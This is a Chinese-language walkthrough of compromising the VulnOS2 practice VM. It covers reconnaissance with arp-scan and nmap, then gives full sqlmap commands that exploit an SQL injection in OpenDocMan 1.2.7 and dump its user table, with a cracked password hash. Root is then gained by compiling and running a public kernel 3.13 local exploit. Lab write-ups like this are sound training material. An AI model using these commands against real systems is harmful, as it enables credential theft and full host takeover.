0X00情报收集
环境准备:VulnOS2
开启虚拟机,使用arp-scan扫描得到目标ip的地址。
root@kali:~# arp-scan 192.168.56.0/24
Interface: eth0, datalink type: EN10MB (Ethernet)
Starting arp-scan 1.9 with 256 hosts (http://www.nta-monitor.com/tools/arp-scan/)
192.168.56.10a:00:27:00:00:0d(Unknown)
192.168.56.10008:00:27:1d:d9:73CADMUS COMPUTER SYSTEMS
192.168.56.10408:00:27:7c:ac:b1CADMUS COMPUTER SYSTEMS
3 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.9: 256 hosts scanned in 2.277 seconds (112.43 hosts/sec). 3 responded
得到目标192.168.56.104。然后使用nmap扫描开开放的端口。
从扫描的结果来看,开放22、80端口。访问80端口,发现是一个网站。
随便翻翻目录发现没有什么可疑的东西。后看看网页源代码。我觉得玩ctf就是要看看源代码,有时候会有出乎意料的发现。
有个提示的目录,/jabcd0cs/ ,访问这个目录。发现是个openDocMan CMS。也可以使用鼠标选中之后才会出现隐藏的文本。
0x02漏洞发现
访问的后台登录界面。看看发现居然有版本号V1.2.7。可以推断得到OpenDocMan是一个cms。
然后看看有没有OpenDocMan的漏洞,百度一搜,果然有个OpenDocMan版本为1.2.7的SQL注入漏洞。
0x03漏洞利用
既然存在sql注入那么就使用大神器Sqlmap。这里我遇到一个坑,就是直接使用sqlmap加存在sql注入地址的网址。结果sqlmap居然煞笔了,不认识存在SQL注入。最后在存在SQL注入的网站后添加—level=2,sqlmap才跑出SQL注入。网上说填加—level=2 sqlmap就会对cookie等参数进行测试。
看看命令:
sqlmap -u "http://192.168.56.104/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" -p add_value --level=2
sqlmap -u "http://192.168.56.104/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" -p add_value --level=2 -D jabcd0cs -T odm_user –dump
得到用户名:Webmin ,密码:b78aae356709f8c31118ea613980954b。SOMD5还是依旧的强大。得到密码明文:webmin1980.
0x04攻陷主机
居然只是普通用户权限。没有查看root目录的权限。那么我们就来提权试试。
内核版本3.13.0-24
searchsploit linux 3.13,搜索版本号为3.13的exp。Searchsploit是exploit-db的搜索程序,没有的可以下载试试。
一般简单的exploit-db的exp都有使用方法。看看代码就知道如何使用。上传exp。
gcc 37292.c -o ofs
./ofs
然后查看权限。OK顺利提权。
大家理理思路。渗透测试重点的就是思路,思路正确,做渗透一点也不难。
本文暂时没有评论,来添加一个吧(●'◡'●)